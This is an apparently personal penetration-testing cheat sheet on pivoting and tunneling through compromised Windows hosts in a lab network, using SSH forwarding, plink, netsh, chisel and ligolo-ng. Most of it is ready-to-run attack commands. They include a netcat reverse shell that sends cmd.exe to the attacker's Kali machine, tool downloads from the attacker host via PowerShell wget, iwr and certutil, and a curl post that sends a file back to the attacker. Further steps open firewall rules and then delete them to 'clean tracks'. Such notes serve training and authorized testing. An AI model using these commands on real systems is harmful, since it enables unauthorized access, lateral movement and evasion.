Windows

IMPORTANT NOTE

NOTE: REMEBER TO CHANGE THE PORT NUMBER IN /ETC/PROXYCHAINS TO KALI PORT YOU HAVE SET UP. (SAFEST IS TO KEEP ALL THE PORT THE SAME TO AVOID CONFUSION)

SSH.exe

SSH Local Tunneling

On CONFLUENCE01

ssh -N -L 0.0.0.0:<CONFLUENCE01 Port>:<HRSHARES01 IP Address>:<HRSHARES Port> <PGDATABASE01 Username>@<PGDATABASE01 IP Address>

On KALI

Any commands running on Kali to be pointed at CONFLUENCE01 IP Address

SSH Dynamic Tunneling

On CONFLUENCE01

ssh -N -D 0.0.0.0:<CONFLUENCE01 Port> <PGDATABASE01 Username>@<PGDATABASE01 IP Address>

On Kali

Any commands running on Kali to be pointed at HRSHARES01 IP Address via Proxychains

SSH Remote Port Forwarding

On CONFLUENCE01

ssh -N -R 127.0.0.1:<Kali Port>:<PGDATABASE01 IP Address>:<PGDATABASE01 Port> kali@<Kali IP Address>

On Kali

Any commands running on Kali to be pointed at Loopback address

NOTE: Make sure machine is running OpenSSH

SSH Remote Dynamic Port Forwarding

On CONFLUENCE01

ssh -N -R <Kali Port> kali@<Kali IP Address>

On Kali

Any commands running on Kali can be pointed at any IP via Proxychains

Plink

NOTE: Make sure can RCE to machine

On Machine

Get Netcat from Kali

powershell wget -Uri http://<Kali IP Address>/nc.exe -Outfile C:\Windows\Temp\nc.exe

Set up listener on Kali
Send reverse shell to Kali via RCE

C:\Windows\Temp\nc.exe -e cmd.exe <Kali IP Address> <Kali Port>

Get plink.exe

powershell wget -Uri http://<Kali IP Address>/plink.exe -Outfile C:\Windows\Temp\plink.exe

Execute port forwarding

C:\Windows\Temp\plink.exe -ssh -l -pw kali -R 127.0.0.1:<Kali Port>:127.0.0.1:3389 <Kali IP Address>

The port forwarding above allow us to RDP into the machine

On Kali

Any commands running on Kali to be pointed Loopback

Netsh

NOTE: Make sure to RDP into a user that has Administrative rights

Create Netsh port forwarding

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=<MULTISERVER03 IP Address> connectport=22 connectaddress=<PGDATABASE01 IP Address>

Create firewall rule

netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=<MULTISERVER03 IP Address> localport=2222 action=allow

The above command allow us to SSH into PGDATABASE01 using PGDATABASE01 Username and MULTISERVER03 IP Address

Clean tracks after done

netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=<MULTISERVER03 IP Address>

Chisel

On Kali

To start server

chisel server --port 8080 --reverse

To monitor network streams

sudo tcpdump -nvvvXi tun0 tcp port 8080

Any commands running on Kali to be pointed at PGDATABASE01 IP Address via Proxychains

On CONFLUENCE01

To install chisel on target machine

iwr -Uri http://<Kali IP Address>:<Kali Port>/chisel.exe -Outfile C:\Windows\Temp\chisel.exe

To port forward

chisel.exe client <Kali IP Address>:<Kali Port> R:socks

To view the error output

chisel.exe client <Kali IP Address>:<Kali Port> R:socks > C:\Windows\Temp\output.txt 2>&1
curl.exe --data-binary @C:\Windows\Temp\output.txt http://<Kali IP Address>:<Kali Port>/

Ligolo-Ng

NOTE: When using nmap, add --unprivileged OR -PE to avoid false positives

Setup

On Kali

sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
sudo ip route add <Internal net>/24 dev ligolo

mkdir ligolo && cd ligolo

mkdir proxy && cd proxy
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
cd ..

mkdir ../agents && cd ../agents
mkdir windows && cd windows
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
cd ..

mkdir linux && cd linux
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
cd ..

python3 -m http.server 80

On Target Machine

certutil -urlcache -split -f http://<Kali IP Address>/<windows / linux>/agent.exe

Tunnel

On Kali

./proxy -selfcert

NOTE: Run the above command in /ligolo/proxy

On Target Machine

agent.exe -connect <Kali IP Address>:<Kali Listening port> -ignore-cert

NOTE: Once agent connects to server, return to Kali Machine and follow the steps in ligolo-ng console

session

<SELECT WHICH SESSION>

start

NOTE: Add the following if you want the internal to reach you. E.G. reverse shell

listener_add --addr 0.0.0.0:<Kali Port> --to 127.0.0.1:<Kali Port>

Verify

listener_list

PreviousLinux NextPublic Exploits

Last updated 9 months ago

hashtagIMPORTANT NOTE

hashtagSSH.exe

hashtagSSH Local Tunneling

hashtagOn CONFLUENCE01

hashtagOn KALI

hashtagSSH Dynamic Tunneling

hashtagOn CONFLUENCE01

hashtagOn Kali

hashtagSSH Remote Port Forwarding

hashtagOn CONFLUENCE01

hashtagOn Kali

hashtagSSH Remote Dynamic Port Forwarding

hashtagOn CONFLUENCE01

hashtagOn Kali

hashtagPlink

hashtagOn Machine

hashtagOn Kali

hashtagNetsh

hashtagCreate Netsh port forwarding

hashtagCreate firewall rule

hashtagClean tracks after done

hashtagChisel

hashtagOn Kali

hashtagOn CONFLUENCE01

hashtagLigolo-Ng

hashtagSetup

hashtagTunnel

IMPORTANT NOTE

SSH.exe

SSH Local Tunneling

On CONFLUENCE01

On KALI

SSH Dynamic Tunneling

On CONFLUENCE01

On Kali

SSH Remote Port Forwarding

On CONFLUENCE01

On Kali

SSH Remote Dynamic Port Forwarding

On CONFLUENCE01

On Kali

Plink

On Machine

On Kali

Netsh

Create Netsh port forwarding

Create firewall rule

Clean tracks after done

Chisel

On Kali

On CONFLUENCE01

Ligolo-Ng

Setup

Tunnel